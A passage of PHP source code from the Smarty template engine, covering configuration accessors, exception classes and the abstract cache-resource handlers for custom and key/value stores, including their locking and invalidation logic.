    public function getAutoLiteral()
    {
        return $this->auto_literal;
    }

    /**
     * Set auto_literal flag
     *
     * @param boolean $auto_literal
     */
    public function setAutoLiteral($auto_literal = true)
    {
        $this->auto_literal = $auto_literal;
    }

    /**
     * @param boolean $force_compile
     */
    public function setForceCompile($force_compile)
    {
        $this->force_compile = $force_compile;
    }

    /**
     * @param boolean $merge_compiled_includes
     */
    public function setMergeCompiledIncludes($merge_compiled_includes)
    {
        $this->merge_compiled_includes = $merge_compiled_includes;
    }

    /**
     * Get left delimiter
     *
     * @return string
     */
    public function getLeftDelimiter()
    {
        return $this->left_delimiter;
    }

    /**
     * Set left delimiter
     *
     * @param string $left_delimiter
     */
    public function setLeftDelimiter($left_delimiter)
    {
        $this->left_delimiter = $left_delimiter;
    }

    /**
     * Get right delimiter
     *
     * @return string $right_delimiter
     */
    public function getRightDelimiter()
    {
        return $this->right_delimiter;
    }

    /**
     * Set right delimiter
     *
     * @param string
     */
    public function setRightDelimiter($right_delimiter)
    {
        $this->right_delimiter = $right_delimiter;
    }

    /**
     * @param boolean $debugging
     */
    public function setDebugging($debugging)
    {
        $this->debugging = $debugging;
    }

    /**
     * @param boolean $config_overwrite
     */
    public function setConfigOverwrite($config_overwrite)
    {
        $this->config_overwrite = $config_overwrite;
    }

    /**
     * @param boolean $config_booleanize
     */
    public function setConfigBooleanize($config_booleanize)
    {
        $this->config_booleanize = $config_booleanize;
    }

    /**
     * @param boolean $config_read_hidden
     */
    public function setConfigReadHidden($config_read_hidden)
    {
        $this->config_read_hidden = $config_read_hidden;
    }

    /**
     * @param boolean $compile_locking
     */
    public function setCompileLocking($compile_locking)
    {
        $this->compile_locking = $compile_locking;
    }

    /**
     * @param string $default_resource_type
     */
    public function setDefaultResourceType($default_resource_type)
    {
        $this->default_resource_type = $default_resource_type;
    }

    /**
     * @param string $caching_type
     */
    public function setCachingType($caching_type)
    {
        $this->caching_type = $caching_type;
    }

    /**
     * Test install
     *
     * @param null $errors
     */
    public function testInstall(&$errors = null)
    {
        Smarty_Internal_TestInstall::testInstall($this, $errors);
    }

    /**
     * Get Smarty object
     *
     * @return Smarty
     */
    public function _getSmartyObj()
    {
        return $this;
    }

    /**
     * <<magic>> Generic getter.
     * Calls the appropriate getter function.
     * Issues an E_USER_NOTICE if no valid getter is found.
     *
     * @param string $name property name
     *
     * @return mixed
     */
    public function __get($name)
    {
        if (isset($this->accessMap[ $name ])) {
            $method = 'get' . $this->accessMap[ $name ];
            return $this->{$method}();
        } elseif (isset($this->_cache[ $name ])) {
            return $this->_cache[ $name ];
        } elseif (in_array($name, $this->obsoleteProperties)) {
            return null;
        } else {
            trigger_error('Undefined property: ' . get_class($this) . '::$' . $name, E_USER_NOTICE);
        }
        return null;
    }

    /**
     * <<magic>> Generic setter.
     * Calls the appropriate setter function.
     * Issues an E_USER_NOTICE if no valid setter is found.
     *
     * @param string $name  property name
     * @param mixed  $value parameter passed to setter
     *
     */
    public function __set($name, $value)
    {
        if (isset($this->accessMap[ $name ])) {
            $method = 'set' . $this->accessMap[ $name ];
            $this->{$method}($value);
        } elseif (in_array($name, $this->obsoleteProperties)) {
            return;
        } elseif (is_object($value) && method_exists($value, $name)) {
            $this->$name = $value;
        } else {
            trigger_error('Undefined property: ' . get_class($this) . '::$' . $name, E_USER_NOTICE);
        }
    }

    /**
     * Normalize and set directory string
     *
     * @param string $dirName cache_dir or compile_dir
     * @param string $dir     filepath of folder
     */
    private function _normalizeDir($dirName, $dir)
    {
        $this->{$dirName} = $this->_realpath(rtrim($dir ?? '', "/\\") . DIRECTORY_SEPARATOR, true);
    }

    /**
     * Normalize template_dir or config_dir
     *
     * @param bool $isConfig true for config_dir
     */
    private function _normalizeTemplateConfig($isConfig)
    {
        if ($isConfig) {
            $processed = &$this->_processedConfigDir;
            $dir = &$this->config_dir;
        } else {
            $processed = &$this->_processedTemplateDir;
            $dir = &$this->template_dir;
        }
        if (!is_array($dir)) {
            $dir = (array)$dir;
        }
        foreach ($dir as $k => $v) {
            if (!isset($processed[ $k ])) {
                $dir[ $k ] = $v = $this->_realpath(rtrim($v ?? '', "/\\") . DIRECTORY_SEPARATOR, true);
                $processed[ $k ] = true;
            }
        }
        $isConfig ? $this->_configDirNormalized = true : $this->_templateDirNormalized = true;
        $isConfig ? $this->_joined_config_dir = join('#', $this->config_dir) :
            $this->_joined_template_dir = join('#', $this->template_dir);
    }

    /**
     * Mutes errors for "undefined index", "undefined array key" and "trying to read property of null".
     *
     * @void
     */
    public function muteUndefinedOrNullWarnings(): void {
        $this->isMutingUndefinedOrNullWarnings = true;
    }

    /**
     * Indicates if Smarty will mute errors for "undefined index", "undefined array key" and "trying to read property of null".
     * @bool
     */
    public function isMutingUndefinedOrNullWarnings(): bool {
        return $this->isMutingUndefinedOrNullWarnings;
    }

}
<?php

/**
 * Smarty compiler exception class
 *
 * @package Smarty
 */
class SmartyCompilerException extends SmartyException
{
    /**
     * The constructor of the exception
     *
     * @param string         $message  The Exception message to throw.
     * @param int            $code     The Exception code.
     * @param string|null    $filename The filename where the exception is thrown.
     * @param int|null       $line     The line number where the exception is thrown.
     * @param Throwable|null $previous The previous exception used for the exception chaining.
     */
    public function __construct(
        string $message = "",
        int $code = 0,
        ?string $filename = null,
        ?int $line = null,
        ?Throwable $previous = null
    ) {
        parent::__construct($message, $code, $previous);

        // These are optional parameters, should be be overridden only when present!
        if ($filename) {
            $this->file = $filename;
        }
        if ($line) {
            $this->line = $line;
        }
    }

    /**
     * @return string
     */
    public function __toString()
    {
        return ' --> Smarty Compiler: ' . $this->message . ' <-- ';
    }

    /**
     * @param int $line
     */
    public function setLine($line)
    {
        $this->line = $line;
    }

    /**
     * The template source snippet relating to the error
     *
     * @type string|null
     */
    public $source = null;

    /**
     * The raw text of the error message
     *
     * @type string|null
     */
    public $desc = null;

    /**
     * The resource identifier or template name
     *
     * @type string|null
     */
    public $template = null;
}
<?php

/**
 * Smarty exception class
 *
 * @package Smarty
 */
class SmartyException extends Exception
{
    public static $escape = false;

    /**
     * @return string
     */
    public function __toString()
    {
        return ' --> Smarty: ' . (self::$escape ? htmlentities($this->message) : $this->message) . ' <-- ';
    }
}
<?php
/**
 * Smarty Internal Plugin
 *
 * @package    Smarty
 * @subpackage Cacher
 */

/**
 * Cache Handler API
 *
 * @package    Smarty
 * @subpackage Cacher
 * @author     Rodney Rehm
 */
abstract class Smarty_CacheResource
{
    /**
     * resource types provided by the core
     *
     * @var array
     */
    protected static $sysplugins = array('file' => 'smarty_internal_cacheresource_file.php',);

    /**
     * populate Cached Object with meta data from Resource
     *
     * @param \Smarty_Template_Cached  $cached    cached object
     * @param Smarty_Internal_Template $_template template object
     *
     * @return void
     */
    abstract public function populate(\Smarty_Template_Cached $cached, Smarty_Internal_Template $_template);

    /**
     * populate Cached Object with timestamp and exists from Resource
     *
     * @param Smarty_Template_Cached $cached
     *
     * @return void
     */
    abstract public function populateTimestamp(Smarty_Template_Cached $cached);

    /**
     * Read the cached template and process header
     *
     * @param Smarty_Internal_Template    $_template template object
     * @param Smarty_Template_Cached|null $cached    cached object
     * @param boolean                     $update    flag if called because cache update
     *
     * @return boolean true or false if the cached content does not exist
     */
    abstract public function process(
        Smarty_Internal_Template $_template,
        ?Smarty_Template_Cached $cached = null,
        $update = false
    );

    /**
     * Write the rendered template output to cache
     *
     * @param Smarty_Internal_Template $_template template object
     * @param string                   $content   content to cache
     *
     * @return boolean success
     */
    abstract public function writeCachedContent(Smarty_Internal_Template $_template, $content);

    /**
     * Read cached template from cache
     *
     * @param Smarty_Internal_Template $_template template object
     *
     * @return string  content
     */
    abstract public function readCachedContent(Smarty_Internal_Template $_template);

    /**
     * Return cached content
     *
     * @param Smarty_Internal_Template $_template template object
     *
     * @return null|string
     */
    public function getCachedContent(Smarty_Internal_Template $_template)
    {
        if ($_template->cached->handler->process($_template)) {
            ob_start();
            $unifunc = $_template->cached->unifunc;
            $unifunc($_template);
            return ob_get_clean();
        }
        return null;
    }

    /**
     * Empty cache
     *
     * @param Smarty  $smarty   Smarty object
     * @param integer $exp_time expiration time (number of seconds, not timestamp)
     *
     * @return integer number of cache files deleted
     */
    abstract public function clearAll(Smarty $smarty, $exp_time = null);

    /**
     * Empty cache for a specific template
     *
     * @param Smarty  $smarty        Smarty object
     * @param string  $resource_name template name
     * @param string  $cache_id      cache id
     * @param string  $compile_id    compile id
     * @param integer $exp_time      expiration time (number of seconds, not timestamp)
     *
     * @return integer number of cache files deleted
     */
    abstract public function clear(Smarty $smarty, $resource_name, $cache_id, $compile_id, $exp_time);

    /**
     * @param Smarty                 $smarty
     * @param Smarty_Template_Cached $cached
     *
     * @return bool|null
     */
    public function locked(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        // theoretically locking_timeout should be checked against time_limit (max_execution_time)
        $start = microtime(true);
        $hadLock = null;
        while ($this->hasLock($smarty, $cached)) {
            $hadLock = true;
            if (microtime(true) - $start > $smarty->locking_timeout) {
                // abort waiting for lock release
                return false;
            }
            sleep(1);
        }
        return $hadLock;
    }

    /**
     * Check is cache is locked for this template
     *
     * @param Smarty                 $smarty
     * @param Smarty_Template_Cached $cached
     *
     * @return bool
     */
    public function hasLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        // check if lock exists
        return false;
    }

    /**
     * Lock cache for this template
     *
     * @param Smarty                 $smarty
     * @param Smarty_Template_Cached $cached
     *
     * @return bool
     */
    public function acquireLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        // create lock
        return true;
    }

    /**
     * Unlock cache for this template
     *
     * @param Smarty                 $smarty
     * @param Smarty_Template_Cached $cached
     *
     * @return bool
     */
    public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        // release lock
        return true;
    }

    /**
     * Load Cache Resource Handler
     *
     * @param Smarty $smarty Smarty object
     * @param string $type   name of the cache resource
     *
     * @throws SmartyException
     * @return Smarty_CacheResource Cache Resource Handler
     */
    public static function load(Smarty $smarty, $type = null)
    {
        if (!isset($type)) {
            $type = $smarty->caching_type;
        }
        // try smarty's cache
        if (isset($smarty->_cache[ 'cacheresource_handlers' ][ $type ])) {
            return $smarty->_cache[ 'cacheresource_handlers' ][ $type ];
        }
        // try registered resource
        if (isset($smarty->registered_cache_resources[ $type ])) {
            // do not cache these instances as they may vary from instance to instance
            return $smarty->_cache[ 'cacheresource_handlers' ][ $type ] = $smarty->registered_cache_resources[ $type ];
        }
        // try sysplugins dir
        if (isset(self::$sysplugins[ $type ])) {
            $cache_resource_class = 'Smarty_Internal_CacheResource_' . smarty_ucfirst_ascii($type);
            return $smarty->_cache[ 'cacheresource_handlers' ][ $type ] = new $cache_resource_class();
        }
        // try plugins dir
        $cache_resource_class = 'Smarty_CacheResource_' . smarty_ucfirst_ascii($type);
        if ($smarty->loadPlugin($cache_resource_class)) {
            return $smarty->_cache[ 'cacheresource_handlers' ][ $type ] = new $cache_resource_class();
        }
        // give up
        throw new SmartyException("Unable to load cache resource '{$type}'");
    }
}
<?php
/**
 * Smarty Internal Plugin
 *
 * @package    Smarty
 * @subpackage Cacher
 */

/**
 * Cache Handler API
 *
 * @package    Smarty
 * @subpackage Cacher
 * @author     Rodney Rehm
 */
abstract class Smarty_CacheResource_Custom extends Smarty_CacheResource
{
    /**
     * fetch cached content and its modification time from data source
     *
     * @param string  $id         unique cache content identifier
     * @param string  $name       template name
     * @param string  $cache_id   cache id
     * @param string  $compile_id compile id
     * @param string  $content    cached content
     * @param integer $mtime      cache modification timestamp (epoch)
     *
     * @return void
     */
    abstract protected function fetch($id, $name, $cache_id, $compile_id, &$content, &$mtime);

    /**
     * Fetch cached content's modification timestamp from data source
     * {@internal implementing this method is optional.
     *  Only implement it if modification times can be accessed faster than loading the complete cached content.}}
     *
     * @param string $id         unique cache content identifier
     * @param string $name       template name
     * @param string $cache_id   cache id
     * @param string $compile_id compile id
     *
     * @return integer|boolean timestamp (epoch) the template was modified, or false if not found
     */
    protected function fetchTimestamp($id, $name, $cache_id, $compile_id)
    {
        return false;
    }

    /**
     * Save content to cache
     *
     * @param string       $id         unique cache content identifier
     * @param string       $name       template name
     * @param string       $cache_id   cache id
     * @param string       $compile_id compile id
     * @param integer|null $exp_time   seconds till expiration or null
     * @param string       $content    content to cache
     *
     * @return boolean      success
     */
    abstract protected function save($id, $name, $cache_id, $compile_id, $exp_time, $content);

    /**
     * Delete content from cache
     *
     * @param string|null  $name       template name
     * @param string|null  $cache_id   cache id
     * @param string|null  $compile_id compile id
     * @param integer|null $exp_time   seconds till expiration time in seconds or null
     *
     * @return integer      number of deleted caches
     */
    abstract protected function delete($name, $cache_id, $compile_id, $exp_time);

    /**
     * populate Cached Object with meta data from Resource
     *
     * @param Smarty_Template_Cached   $cached    cached object
     * @param Smarty_Internal_Template $_template template object
     *
     * @return void
     */
    public function populate(Smarty_Template_Cached $cached, Smarty_Internal_Template $_template)
    {
        $_cache_id = isset($cached->cache_id) ? preg_replace('![^\w\|]+!', '_', $cached->cache_id) : null;
        $_compile_id = isset($cached->compile_id) ? preg_replace('![^\w]+!', '_', $cached->compile_id) : null;
        $path = $cached->source->uid . $_cache_id . $_compile_id;
        $cached->filepath = sha1($path);
        if ($_template->smarty->cache_locking) {
            $cached->lock_id = sha1('lock.' . $path);
        }
        $this->populateTimestamp($cached);
    }

    /**
     * populate Cached Object with timestamp and exists from Resource
     *
     * @param Smarty_Template_Cached $cached
     *
     * @return void
     */
    public function populateTimestamp(Smarty_Template_Cached $cached)
    {
        $mtime =
            $this->fetchTimestamp($cached->filepath, $cached->source->name, $cached->cache_id, $cached->compile_id);
        if ($mtime !== null) {
            $cached->timestamp = $mtime;
            $cached->exists = !!$cached->timestamp;
            return;
        }
        $timestamp = null;
        $this->fetch(
            $cached->filepath,
            $cached->source->name,
            $cached->cache_id,
            $cached->compile_id,
            $cached->content,
            $timestamp
        );
        $cached->timestamp = isset($timestamp) ? $timestamp : false;
        $cached->exists = !!$cached->timestamp;
    }

    /**
     * Read the cached template and process the header
     *
     * @param \Smarty_Internal_Template   $_smarty_tpl do not change variable name, is used by compiled template
     * @param Smarty_Template_Cached|null $cached      cached object
     * @param boolean                     $update      flag if called because cache update
     *
     * @return boolean                 true or false if the cached content does not exist
     */
    public function process(
        Smarty_Internal_Template $_smarty_tpl,
        ?Smarty_Template_Cached $cached = null,
        $update = false
    ) {
        if (!$cached) {
            $cached = $_smarty_tpl->cached;
        }
        $content = $cached->content ? $cached->content : null;
        $timestamp = $cached->timestamp ? $cached->timestamp : null;
        if ($content === null || !$timestamp) {
            $this->fetch(
                $_smarty_tpl->cached->filepath,
                $_smarty_tpl->source->name,
                $_smarty_tpl->cache_id,
                $_smarty_tpl->compile_id,
                $content,
                $timestamp
            );
        }
        if (isset($content)) {
            eval('?>' . $content);
            $cached->content = null;
            return true;
        }
        return false;
    }

    /**
     * Write the rendered template output to cache
     *
     * @param Smarty_Internal_Template $_template template object
     * @param string                   $content   content to cache
     *
     * @return boolean                  success
     */
    public function writeCachedContent(Smarty_Internal_Template $_template, $content)
    {
        return $this->save(
            $_template->cached->filepath,
            $_template->source->name,
            $_template->cache_id,
            $_template->compile_id,
            $_template->cache_lifetime,
            $content
        );
    }

    /**
     * Read cached template from cache
     *
     * @param Smarty_Internal_Template $_template template object
     *
     * @return string|boolean  content
     */
    public function readCachedContent(Smarty_Internal_Template $_template)
    {
        $content = $_template->cached->content ? $_template->cached->content : null;
        $timestamp = null;
        if ($content === null) {
            $timestamp = null;
            $this->fetch(
                $_template->cached->filepath,
                $_template->source->name,
                $_template->cache_id,
                $_template->compile_id,
                $content,
                $timestamp
            );
        }
        if (isset($content)) {
            return $content;
        }
        return false;
    }

    /**
     * Empty cache
     *
     * @param Smarty  $smarty   Smarty object
     * @param integer $exp_time expiration time (number of seconds, not timestamp)
     *
     * @return integer number of cache files deleted
     */
    public function clearAll(Smarty $smarty, $exp_time = null)
    {
        return $this->delete(null, null, null, $exp_time);
    }

    /**
     * Empty cache for a specific template
     *
     * @param Smarty  $smarty        Smarty object
     * @param string  $resource_name template name
     * @param string  $cache_id      cache id
     * @param string  $compile_id    compile id
     * @param integer $exp_time      expiration time (number of seconds, not timestamp)
     *
     * @return int number of cache files deleted
     * @throws \SmartyException
     */
    public function clear(Smarty $smarty, $resource_name, $cache_id, $compile_id, $exp_time)
    {
        $cache_name = null;
        if (isset($resource_name)) {
            $source = Smarty_Template_Source::load(null, $smarty, $resource_name);
            if ($source->exists) {
                $cache_name = $source->name;
            } else {
                return 0;
            }
        }
        return $this->delete($cache_name, $cache_id, $compile_id, $exp_time);
    }

    /**
     * Check is cache is locked for this template
     *
     * @param Smarty                 $smarty Smarty object
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return boolean               true or false if cache is locked
     */
    public function hasLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        $id = $cached->lock_id;
        $name = $cached->source->name . '.lock';
        $mtime = $this->fetchTimestamp($id, $name, $cached->cache_id, $cached->compile_id);
        if ($mtime === null) {
            $this->fetch($id, $name, $cached->cache_id, $cached->compile_id, $content, $mtime);
        }
        return $mtime && ($t = time()) - $mtime < $smarty->locking_timeout;
    }

    /**
     * Lock cache for this template
     *
     * @param Smarty                 $smarty Smarty object
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return bool|void
     */
    public function acquireLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        $cached->is_locked = true;
        $id = $cached->lock_id;
        $name = $cached->source->name . '.lock';
        $this->save($id, $name, $cached->cache_id, $cached->compile_id, $smarty->locking_timeout, '');
    }

    /**
     * Unlock cache for this template
     *
     * @param Smarty                 $smarty Smarty object
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return bool|void
     */
    public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        $cached->is_locked = false;
        $name = $cached->source->name . '.lock';
        $this->delete($name, $cached->cache_id, $cached->compile_id, null);
    }
}
<?php
/**
 * Smarty Internal Plugin
 *
 * @package    Smarty
 * @subpackage Cacher
 */

/**
 * Smarty Cache Handler Base for Key/Value Storage Implementations
 * This class implements the functionality required to use simple key/value stores
 * for hierarchical cache groups. key/value stores like memcache or APC do not support
 * wildcards in keys, therefore a cache group cannot be cleared like "a|*" - which
 * is no problem to filesystem and RDBMS implementations.
 * This implementation is based on the concept of invalidation. While one specific cache
 * can be identified and cleared, any range of caches cannot be identified. For this reason
 * each level of the cache group hierarchy can have its own value in the store. These values
 * are nothing but microtimes, telling us when a particular cache group was cleared for the
 * last time. These keys are evaluated for every cache read to determine if the cache has
 * been invalidated since it was created and should hence be treated as inexistent.
 * Although deep hierarchies are possible, they are not recommended. Try to keep your
 * cache groups as shallow as possible. Anything up 3-5 parents should be ok. So
 * »a|b|c« is a good depth where »a|b|c|d|e|f|g|h|i|j|k« isn't. Try to join correlating
 * cache groups: if your cache groups look somewhat like »a|b|$page|$items|$whatever«
 * consider using »a|b|c|$page-$items-$whatever« instead.
 *
 * @package    Smarty
 * @subpackage Cacher
 * @author     Rodney Rehm
 */
abstract class Smarty_CacheResource_KeyValueStore extends Smarty_CacheResource
{
    /**
     * cache for contents
     *
     * @var array
     */
    protected $contents = array();

    /**
     * cache for timestamps
     *
     * @var array
     */
    protected $timestamps = array();

    /**
     * populate Cached Object with meta data from Resource
     *
     * @param Smarty_Template_Cached   $cached    cached object
     * @param Smarty_Internal_Template $_template template object
     *
     * @return void
     */
    public function populate(Smarty_Template_Cached $cached, Smarty_Internal_Template $_template)
    {
        $cached->filepath = $_template->source->uid . '#' . $this->sanitize($cached->source->resource) . '#' .
                            $this->sanitize($cached->cache_id) . '#' . $this->sanitize($cached->compile_id);
        $this->populateTimestamp($cached);
    }

    /**
     * populate Cached Object with timestamp and exists from Resource
     *
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return void
     */
    public function populateTimestamp(Smarty_Template_Cached $cached)
    {
        if (!$this->fetch(
            $cached->filepath,
            $cached->source->name,
            $cached->cache_id,
            $cached->compile_id,
            $content,
            $timestamp,
            $cached->source->uid
        )
        ) {
            return;
        }
        $cached->content = $content;
        $cached->timestamp = (int)$timestamp;
        $cached->exists = !!$cached->timestamp;
    }

    /**
     * Read the cached template and process the header
     *
     * @param \Smarty_Internal_Template   $_smarty_tpl do not change variable name, is used by compiled template
     * @param Smarty_Template_Cached|null $cached      cached object
     * @param boolean                     $update      flag if called because cache update
     *
     * @return boolean                 true or false if the cached content does not exist
     */
    public function process(
        Smarty_Internal_Template $_smarty_tpl,
        ?Smarty_Template_Cached $cached = null,
        $update = false
    ) {
        if (!$cached) {
            $cached = $_smarty_tpl->cached;
        }
        $content = $cached->content ? $cached->content : null;
        $timestamp = $cached->timestamp ? $cached->timestamp : null;
        if ($content === null || !$timestamp) {
            if (!$this->fetch(
                $_smarty_tpl->cached->filepath,
                $_smarty_tpl->source->name,
                $_smarty_tpl->cache_id,
                $_smarty_tpl->compile_id,
                $content,
                $timestamp,
                $_smarty_tpl->source->uid
            )
            ) {
                return false;
            }
        }
        if (isset($content)) {
            eval('?>' . $content);
            return true;
        }
        return false;
    }

    /**
     * Write the rendered template output to cache
     *
     * @param Smarty_Internal_Template $_template template object
     * @param string                   $content   content to cache
     *
     * @return boolean                  success
     */
    public function writeCachedContent(Smarty_Internal_Template $_template, $content)
    {
        $this->addMetaTimestamp($content);
        return $this->write(array($_template->cached->filepath => $content), $_template->cache_lifetime);
    }

    /**
     * Read cached template from cache
     *
     * @param Smarty_Internal_Template $_template template object
     *
     * @return string|false  content
     */
    public function readCachedContent(Smarty_Internal_Template $_template)
    {
        $content = $_template->cached->content ? $_template->cached->content : null;
        $timestamp = null;
        if ($content === null) {
            if (!$this->fetch(
                $_template->cached->filepath,
                $_template->source->name,
                $_template->cache_id,
                $_template->compile_id,
                $content,
                $timestamp,
                $_template->source->uid
            )
            ) {
                return false;
            }
        }
        if (isset($content)) {
            return $content;
        }
        return false;
    }

    /**
     * Empty cache
     * {@internal the $exp_time argument is ignored altogether }}
     *
     * @param Smarty  $smarty   Smarty object
     * @param integer $exp_time expiration time [being ignored]
     *
     * @return integer number of cache files deleted [always -1]
     * @uses   purge() to clear the whole store
     * @uses   invalidate() to mark everything outdated if purge() is inapplicable
     */
    public function clearAll(Smarty $smarty, $exp_time = null)
    {
        if (!$this->purge()) {
            $this->invalidate(null);
        }
        return -1;
    }

    /**
     * Empty cache for a specific template
     * {@internal the $exp_time argument is ignored altogether}}
     *
     * @param Smarty  $smarty        Smarty object
     * @param string  $resource_name template name
     * @param string  $cache_id      cache id
     * @param string  $compile_id    compile id
     * @param integer $exp_time      expiration time [being ignored]
     *
     * @return int number of cache files deleted [always -1]
     * @throws \SmartyException
     * @uses   buildCachedFilepath() to generate the CacheID
     * @uses   invalidate() to mark CacheIDs parent chain as outdated
     * @uses   delete() to remove CacheID from cache
     */
    public function clear(Smarty $smarty, $resource_name, $cache_id, $compile_id, $exp_time)
    {
        $uid = $this->getTemplateUid($smarty, $resource_name);
        $cid = $uid . '#' . $this->sanitize($resource_name) . '#' . $this->sanitize($cache_id) . '#' .
               $this->sanitize($compile_id);
        $this->delete(array($cid));
        $this->invalidate($cid, $resource_name, $cache_id, $compile_id, $uid);
        return -1;
    }

    /**
     * Get template's unique ID
     *
     * @param Smarty $smarty        Smarty object
     * @param string $resource_name template name
     *
     * @return string filepath of cache file
     * @throws \SmartyException
     */
    protected function getTemplateUid(Smarty $smarty, $resource_name)
    {
        if (isset($resource_name)) {
            $source = Smarty_Template_Source::load(null, $smarty, $resource_name);
            if ($source->exists) {
                return $source->uid;
            }
        }
        return '';
    }

    /**
     * Sanitize CacheID components
     *
     * @param string $string CacheID component to sanitize
     *
     * @return string sanitized CacheID component
     */
    protected function sanitize($string)
    {
        $string = trim((string)$string, '|');
        if (!$string) {
            return '';
        }
        return preg_replace('#[^\w\|]+#S', '_', $string);
    }

    /**
     * Fetch and prepare a cache object.
     *
     * @param string  $cid           CacheID to fetch
     * @param string  $resource_name template name
     * @param string  $cache_id      cache id
     * @param string  $compile_id    compile id
     * @param string  $content       cached content
     * @param integer &$timestamp    cached timestamp (epoch)
     * @param string  $resource_uid  resource's uid
     *
     * @return boolean success
     */
    protected function fetch(
        $cid,
        $resource_name = null,
        $cache_id = null,
        $compile_id = null,
        &$content = null,
        &$timestamp = null,
        $resource_uid = null
    ) {
        $t = $this->read(array($cid));
        $content = !empty($t[ $cid ]) ? $t[ $cid ] : null;
        $timestamp = null;
        if ($content && ($timestamp = $this->getMetaTimestamp($content))) {
            $invalidated =
                $this->getLatestInvalidationTimestamp($cid, $resource_name, $cache_id, $compile_id, $resource_uid);
            if ($invalidated > $timestamp) {
                $timestamp = null;
                $content = null;
            }
        }
        return !!$content;
    }

    /**
     * Add current microtime to the beginning of $cache_content
     * {@internal the header uses 8 Bytes, the first 4 Bytes are the seconds, the second 4 Bytes are the microseconds}}
     *
     * @param string &$content the content to be cached
     */
    protected function addMetaTimestamp(&$content)
    {
        $mt = explode(' ', microtime());
        $ts = pack('NN', $mt[ 1 ], (int)($mt[ 0 ] * 100000000));
        $content = $ts . $content;
    }

    /**
     * Extract the timestamp the $content was cached
     *
     * @param string &$content the cached content
     *
     * @return float  the microtime the content was cached
     */
    protected function getMetaTimestamp(&$content)
    {
        extract(unpack('N1s/N1m/a*content', $content));
        /**
         * @var  int $s
         * @var  int $m
         */
        return $s + ($m / 100000000);
    }

    /**
     * Invalidate CacheID
     *
     * @param string $cid           CacheID
     * @param string $resource_name template name
     * @param string $cache_id      cache id
     * @param string $compile_id    compile id
     * @param string $resource_uid  source's uid
     *
     * @return void
     */
    protected function invalidate(
        $cid = null,
        $resource_name = null,
        $cache_id = null,
        $compile_id = null,
        $resource_uid = null
    ) {
        $now = microtime(true);
        $key = null;
        // invalidate everything
        if (!$resource_name && !$cache_id && !$compile_id) {
            $key = 'IVK#ALL';
        } // invalidate all caches by template
        else {
            if ($resource_name && !$cache_id && !$compile_id) {
                $key = 'IVK#TEMPLATE#' . $resource_uid . '#' . $this->sanitize($resource_name);
            } // invalidate all caches by cache group
            else {
                if (!$resource_name && $cache_id && !$compile_id) {
                    $key = 'IVK#CACHE#' . $this->sanitize($cache_id);
                } // invalidate all caches by compile id
                else {
                    if (!$resource_name && !$cache_id && $compile_id) {
                        $key = 'IVK#COMPILE#' . $this->sanitize($compile_id);
                    } // invalidate by combination
                    else {
                        $key = 'IVK#CID#' . $cid;
                    }
                }
            }
        }
        $this->write(array($key => $now));
    }

    /**
     * Determine the latest timestamp known to the invalidation chain
     *
     * @param string $cid           CacheID to determine latest invalidation timestamp of
     * @param string $resource_name template name
     * @param string $cache_id      cache id
     * @param string $compile_id    compile id
     * @param string $resource_uid  source's filepath
     *
     * @return float  the microtime the CacheID was invalidated
     */
    protected function getLatestInvalidationTimestamp(
        $cid,
        $resource_name = null,
        $cache_id = null,
        $compile_id = null,
        $resource_uid = null
    ) {
        // abort if there is no CacheID
        if (false && !$cid) {
            return 0;
        }
        // abort if there are no InvalidationKeys to check
        if (!($_cid = $this->listInvalidationKeys($cid, $resource_name, $cache_id, $compile_id, $resource_uid))) {
            return 0;
        }
        // there are no InValidationKeys
        if (!($values = $this->read($_cid))) {
            return 0;
        }
        // make sure we're dealing with floats
        $values = array_map('floatval', $values);
        return max($values);
    }

    /**
     * Translate a CacheID into the list of applicable InvalidationKeys.
     * Splits 'some|chain|into|an|array' into array( '#clearAll#', 'some', 'some|chain', 'some|chain|into', ... )
     *
     * @param string $cid           CacheID to translate
     * @param string $resource_name template name
     * @param string $cache_id      cache id
     * @param string $compile_id    compile id
     * @param string $resource_uid  source's filepath
     *
     * @return array  list of InvalidationKeys
     * @uses   $invalidationKeyPrefix to prepend to each InvalidationKey
     */
    protected function listInvalidationKeys(
        $cid,
        $resource_name = null,
        $cache_id = null,
        $compile_id = null,
        $resource_uid = null
    ) {
        $t = array('IVK#ALL');
        $_name = $_compile = '#';
        if ($resource_name) {
            $_name .= $resource_uid . '#' . $this->sanitize($resource_name);
            $t[] = 'IVK#TEMPLATE' . $_name;
        }
        if ($compile_id) {
            $_compile .= $this->sanitize($compile_id);
            $t[] = 'IVK#COMPILE' . $_compile;
        }
        $_name .= '#';
        $cid = trim((string)$cache_id, '|');
        if (!$cid) {
            return $t;
        }
        $i = 0;
        while (true) {
            // determine next delimiter position
            $i = strpos($cid, '|', $i);
            // add complete CacheID if there are no more delimiters
            if ($i === false) {
                $t[] = 'IVK#CACHE#' . $cid;
                $t[] = 'IVK#CID' . $_name . $cid . $_compile;
                $t[] = 'IVK#CID' . $_name . $_compile;
                break;
            }
            $part = substr($cid, 0, $i);
            // add slice to list
            $t[] = 'IVK#CACHE#' . $part;
            $t[] = 'IVK#CID' . $_name . $part . $_compile;
            // skip past delimiter position
            $i++;
        }
        return $t;
    }

    /**
     * Check is cache is locked for this template
     *
     * @param Smarty                 $smarty Smarty object
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return boolean               true or false if cache is locked
     */
    public function hasLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        $key = 'LOCK#' . $cached->filepath;
        $data = $this->read(array($key));
        return $data && time() - $data[ $key ] < $smarty->locking_timeout;
    }

    /**
     * Lock cache for this template
     *
     * @param Smarty                 $smarty Smarty object
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return bool|void
     */
    public function acquireLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        $cached->is_locked = true;
        $key = 'LOCK#' . $cached->filepath;
        $this->write(array($key => time()), $smarty->locking_timeout);
    }

    /**
     * Unlock cache for this template
     *
     * @param Smarty                 $smarty Smarty object
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return bool|void
     */
